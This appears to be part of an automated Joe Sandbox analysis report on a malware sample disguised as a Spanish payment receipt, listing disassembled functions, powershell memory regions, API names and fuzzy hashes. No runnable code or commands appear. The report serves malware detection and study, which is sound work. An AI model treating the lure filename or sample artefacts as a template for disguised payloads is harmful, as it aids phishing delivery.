                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                                                    • API String ID: 2709904686-224404859
                                                                                                                                                                                    • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                    • Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
                                                                                                                                                                                    • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                    • Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC
                                                                                                                                                                                    Function 00405F5C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
                                                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                    • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                    • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 009FF520 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2052974379.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_9fd000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 31c72f1e8f026e8b3f5eea7003df23894890c97ad4b14b18affa0cb06df957da
                                                                                                                                                                                    • Instruction ID: 974503d16600b438d353630172116e66832be29fa7a874cdb86b7afdb574f285
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31c72f1e8f026e8b3f5eea7003df23894890c97ad4b14b18affa0cb06df957da
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC210076504208DFCF05DF24DAD0B36BFA5EF88314F20C5B9EA094A256C33AD856CB61
                                                                                                                                                                                    Function 070AC3D7 Relevance: 14.7, Strings: 11, Instructions: 993COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (fzl$(fzl$4'^q$4'^q$4'^q$4'^q$4wl$4wl$x.kk$x.kk$-kk
                                                                                                                                                                                    • API String ID: 0-1786377780
                                                                                                                                                                                    • Opcode ID: cd72fbf6f8ad30ed30f9cf439160d01109d1e02f54f8f14f92e6d35be267ef20
                                                                                                                                                                                    • Instruction ID: 9f53a58133acbf5a98ac5b7fecf94083659ad84285c2e4a5b1d92167e16c5924
                                                                                                                                                                                    • Opcode Fuzzy Hash: cd72fbf6f8ad30ed30f9cf439160d01109d1e02f54f8f14f92e6d35be267ef20
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48927B74B002189FEB50DB58CD51B9ABBF2BB85304F5081A8D909AF755CB72ED82CF91
                                                                                                                                                                                    Function 070A62C8 Relevance: 13.5, Strings: 10, Instructions: 978COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (fzl$(fzl$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$x.kk$-kk
                                                                                                                                                                                    • API String ID: 0-2669534972
                                                                                                                                                                                    • Opcode ID: 0e23f647db14f0fefca2bea5d6b681e4c50624baf23c15b767182f18fb510a71
                                                                                                                                                                                    • Instruction ID: 31a95ac13900814465fb1c4f3ae70c1f465bde3fc1722fb1d9d7253aba88a466
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e23f647db14f0fefca2bea5d6b681e4c50624baf23c15b767182f18fb510a71
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A82A2B4B002059FDB54DBA8C940B6ABBF2BF85304F14C1A9D509AF355CB72ED85CBA1
                                                                                                                                                                                    Function 08FA0888 Relevance: 12.9, Strings: 10, Instructions: 377COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (fzl$(fzl$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-1802549110
                                                                                                                                                                                    • Opcode ID: 69f6fe47686edb3b6b900b50b2bf996e4c72723710a5287b8d34cb14ccd43e55
                                                                                                                                                                                    • Instruction ID: 436dee9daa7fa485287a936869008e55634235e94f79437b9d69832b2a6a5819
                                                                                                                                                                                    • Opcode Fuzzy Hash: 69f6fe47686edb3b6b900b50b2bf996e4c72723710a5287b8d34cb14ccd43e55
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9BE181B5A00604DFDB14CF68D554AAABBF2AFC9325F148069D805AF355CF32EC45CBA1
                                                                                                                                                                                    Function 070A7E68 Relevance: 10.4, Strings: 8, Instructions: 373COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (fzl$(fzl$4'^q$4'^q$4'^q$4'^q$x.kk$-kk
                                                                                                                                                                                    • API String ID: 0-234570147
                                                                                                                                                                                    • Opcode ID: 006c41172144bca49f290c28d2742a4df3fb09e6c79aed2fd910493ff04d867c
                                                                                                                                                                                    • Instruction ID: aba6d7f68703f18fc4d5bc69674683c051dce9849041522162ea096726514e8a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 006c41172144bca49f290c28d2742a4df3fb09e6c79aed2fd910493ff04d867c
                                                                                                                                                                                    • Instruction Fuzzy Hash: FEE16EB0A002059FDB14DBA8C551BAEBBF2BF88304F14C669D5056F395CB72ED86CB91
                                                                                                                                                                                    Function 08FA0498 Relevance: 9.1, Strings: 7, Instructions: 317COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3199432138
                                                                                                                                                                                    • Opcode ID: b9eee42e421ecd3851064f45470866c007c674885dbb46c2e9fcfd5fe4f486e5
                                                                                                                                                                                    • Instruction ID: 82c314a934bf492ad2a6b5ff4acc21e4efb75fcbc839cff6b75313ffad36011d
                                                                                                                                                                                    • Opcode Fuzzy Hash: b9eee42e421ecd3851064f45470866c007c674885dbb46c2e9fcfd5fe4f486e5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 74B125B1F04609CFCB248A78E4546AA7BE2AFC5226F14847ED445CF351EF36D885CBA1
                                                                                                                                                                                    Function 08FA2A50 Relevance: 6.7, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3272787073
                                                                                                                                                                                    • Opcode ID: 89eab289b2d38f145b8b7732ef84f4d9dcef4c015ae6e1723dca309ce6106fb9
                                                                                                                                                                                    • Instruction ID: f391e70f3512a3e605c2e89840afa50de33f630cb4091998decd923b3f13afec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89eab289b2d38f145b8b7732ef84f4d9dcef4c015ae6e1723dca309ce6106fb9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF1F4B1F04209CFCB25DF78C54466ABBE2AF85222F14C4AAD505CF266DB31DD86C7A1
                                                                                                                                                                                    Function 070A7E44 Relevance: 6.6, Strings: 5, Instructions: 309COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (fzl$4'^q$4'^q$x.kk$-kk
                                                                                                                                                                                    • API String ID: 0-3285808753
                                                                                                                                                                                    • Opcode ID: 658a34edf21506d41e95a6d1d92e4b9872c8fb34f9b2667fd65795a6db193b8e
                                                                                                                                                                                    • Instruction ID: cbc4b6cd85904cada9fc449d9656d526a180560697e2be3137516af2104b349f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 658a34edf21506d41e95a6d1d92e4b9872c8fb34f9b2667fd65795a6db193b8e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DC171B0A002059FDB15CBA8C541BAEBBF2BF88304F14C665D5056F396CB75ED46CB91
                                                                                                                                                                                    Function 070ACDA7 Relevance: 5.4, Strings: 4, Instructions: 425COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (fzl$4'^q$4wl$x.kk
                                                                                                                                                                                    • API String ID: 0-2072943238
                                                                                                                                                                                    • Opcode ID: e4bb2f6786440b0a5bd5650b60cbf8ebefdefea0f22df1f56df6cfa4eb56749e
                                                                                                                                                                                    • Instruction ID: 6fa3c68b07cb63e8ddd3ef110e617836e9678de5d96a62e400cdc3545f26c23b
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4bb2f6786440b0a5bd5650b60cbf8ebefdefea0f22df1f56df6cfa4eb56749e
                                                                                                                                                                                    • Instruction Fuzzy Hash: F3127DB4B00219DFEB60CB58C950B9ABBB2BB85304F51C2E4D5096B755CB72ED81CF91
                                                                                                                                                                                    Function 070ACD91 Relevance: 5.3, Strings: 4, Instructions: 331COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (fzl$4'^q$4wl$x.kk
                                                                                                                                                                                    • API String ID: 0-2072943238
                                                                                                                                                                                    • Opcode ID: a836f1717f78f18ec2fa39cef6c9dea8ad2ffa60f65faff7aaccecc1cfbaebd9
                                                                                                                                                                                    • Instruction ID: cf2656da60f6e67a32e165949d438db915c593583f732a90d56406d1c655b228
                                                                                                                                                                                    • Opcode Fuzzy Hash: a836f1717f78f18ec2fa39cef6c9dea8ad2ffa60f65faff7aaccecc1cfbaebd9
                                                                                                                                                                                    • Instruction Fuzzy Hash: E8E16BB4B00219DFEB60CB54C951B9ABBF2BB85304F5082E4D509AB755CB72ED81CF91
                                                                                                                                                                                    Function 070A84C0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (fzl$(fzl$(fzl$(fzl
                                                                                                                                                                                    • API String ID: 0-3225199445
                                                                                                                                                                                    • Opcode ID: 5cd2a66ce93079c818473b9e9d0288e03696c326cbccd46023164fdb18a5794d
                                                                                                                                                                                    • Instruction ID: b31d3d9552e781d634b91dbbb523b2514ec853cfd76ccaf7cc904cd5de9e0f11
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cd2a66ce93079c818473b9e9d0288e03696c326cbccd46023164fdb18a5794d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18716FB0A00205EFDB55CFA8C541AAEBBF2AF89314F14C269D9056F395CB32DC81CB91
                                                                                                                                                                                    Function 070A70F0 Relevance: 4.4, Strings: 3, Instructions: 647COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$x.kk$-kk
                                                                                                                                                                                    • API String ID: 0-3250776378
                                                                                                                                                                                    • Opcode ID: 53616b1c07fcbbe829ee2ee3608ca7b611fc88107720e2195aee0010a7da37b4
                                                                                                                                                                                    • Instruction ID: 7ee372b00ee9b25644bce62e7e539fba6af67d1b8ad248dcf3d20d13138ad1a3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 53616b1c07fcbbe829ee2ee3608ca7b611fc88107720e2195aee0010a7da37b4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F527DB4B002159FEB50DB58C941F59BBB2BB85304F15C1A9D909AF361CB72ED82CBA1
                                                                                                                                                                                    Function 070A6660 Relevance: 4.4, Strings: 3, Instructions: 628COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$x.kk$-kk
                                                                                                                                                                                    • API String ID: 0-3250776378
                                                                                                                                                                                    • Opcode ID: 05723954bc58eaf9abcb34ea42eaf79c7351097661953f5af8edaf101ca0d6ab
                                                                                                                                                                                    • Instruction ID: 71765b7982a35d427b05e663f912b92afa196b31a96e3029d6a653526c50df72
                                                                                                                                                                                    • Opcode Fuzzy Hash: 05723954bc58eaf9abcb34ea42eaf79c7351097661953f5af8edaf101ca0d6ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 56425AB4A002159FEB54CF98C940F99BBF2BB85304F15C1A9D909AF351CB72ED86CB91
                                                                                                                                                                                    Function 070ACC21 Relevance: 4.4, Strings: 3, Instructions: 620COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$x.kk$-kk
                                                                                                                                                                                    • API String ID: 0-3250776378
                                                                                                                                                                                    • Opcode ID: bf0028c17fdb2eaec689fc36f8d40c334afbbaaf69c2ffcc8f5a7cf835a657e7
                                                                                                                                                                                    • Instruction ID: eacde1db1b8feb84f2fcf55660df49384df6bc85e546b9b919ca16ff23b2f67c
                                                                                                                                                                                    • Opcode Fuzzy Hash: bf0028c17fdb2eaec689fc36f8d40c334afbbaaf69c2ffcc8f5a7cf835a657e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E427F74B003149FE750DB58CD51FAABBF2AB8A304F5181A9D9096F351CB72ED828F91
                                                                                                                                                                                    Function 070A7201 Relevance: 4.2, Strings: 3, Instructions: 485COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$x.kk$-kk
                                                                                                                                                                                    • API String ID: 0-3250776378
                                                                                                                                                                                    • Opcode ID: b6f4aaa0eb5284dce6f1ba9edaa0935fa8675c94d943437086e2a8b9dbb020c0
                                                                                                                                                                                    • Instruction ID: f93880e07f8ce46885089f3b4590706189f252a13593af783edc0e21ea4ab6e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: b6f4aaa0eb5284dce6f1ba9edaa0935fa8675c94d943437086e2a8b9dbb020c0
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7227EB4B002159FEB50DF58C941F59BBB2BB85304F15C198D909AF361CB72ED86CBA1
                                                                                                                                                                                    Function 070ACD0A Relevance: 4.2, Strings: 3, Instructions: 466COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$x.kk$-kk
                                                                                                                                                                                    • API String ID: 0-3250776378
                                                                                                                                                                                    • Opcode ID: c6131e8886319e61be9eeb5a4fe9f7d832d7c9bbe0d8594b55c9ea225952732e
                                                                                                                                                                                    • Instruction ID: 43e165e63ca7a65732a138a3a91c5ea76ed67c6e7f6a097dbc4b5bdfb41cfc2c
                                                                                                                                                                                    • Opcode Fuzzy Hash: c6131e8886319e61be9eeb5a4fe9f7d832d7c9bbe0d8594b55c9ea225952732e
                                                                                                                                                                                    • Instruction Fuzzy Hash: AE126E747003149FE714DB58CD51FAABBF2AB8A304F5181A9D9096F391CB72ED828F91
                                                                                                                                                                                    Function 070A3E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-831282457
                                                                                                                                                                                    • Opcode ID: f5e01f63a9680f9798891cb0eca59014106182ced93d629671a29b3acee5638c
                                                                                                                                                                                    • Instruction ID: 617cf12f8268849648c55d4554b1fac78f809a5edc3e6462129fc12a2a1b4340
                                                                                                                                                                                    • Opcode Fuzzy Hash: f5e01f63a9680f9798891cb0eca59014106182ced93d629671a29b3acee5638c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 954168B2F00216ABCB649EB9D80066FFBE5AF94610F14862AD815EB345DF32D90487E0
                                                                                                                                                                                    Function 08FA2A33 Relevance: 3.8, Strings: 3, Instructions: 80COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-2291298209
                                                                                                                                                                                    • Opcode ID: ef4535e9d55b49ec8de753b9a76a7ba1f07c8f32ddeed974bb1d13926a354b2d
                                                                                                                                                                                    • Instruction ID: d7061dca8b515faf2019617d8ddc1b7de9d5fc604bd6d5ba1e14728c08592245
                                                                                                                                                                                    • Opcode Fuzzy Hash: ef4535e9d55b49ec8de753b9a76a7ba1f07c8f32ddeed974bb1d13926a354b2d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 30217AF5F04246CFCB348E75C680665BBF1EF45672F1984AEC8449B125DB31C98ACB62
                                                                                                                                                                                    Function 070A849D Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (fzl$(fzl
                                                                                                                                                                                    • API String ID: 0-1925437669
                                                                                                                                                                                    • Opcode ID: 073170050c6236340f54461e4ca6fde85ba2ef6d57892f6f13c734ae7661287f
                                                                                                                                                                                    • Instruction ID: fd804d52d81759c82f6d4ca9efd708a1ab26de08256e4f2865fb9ad56392a743
                                                                                                                                                                                    • Opcode Fuzzy Hash: 073170050c6236340f54461e4ca6fde85ba2ef6d57892f6f13c734ae7661287f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 56615EB4A00205EFEB56CFA8C550A9DBBF2BF49314F19C26AD9156B3A1C732E841CF51
                                                                                                                                                                                    Function 070A3DEB Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
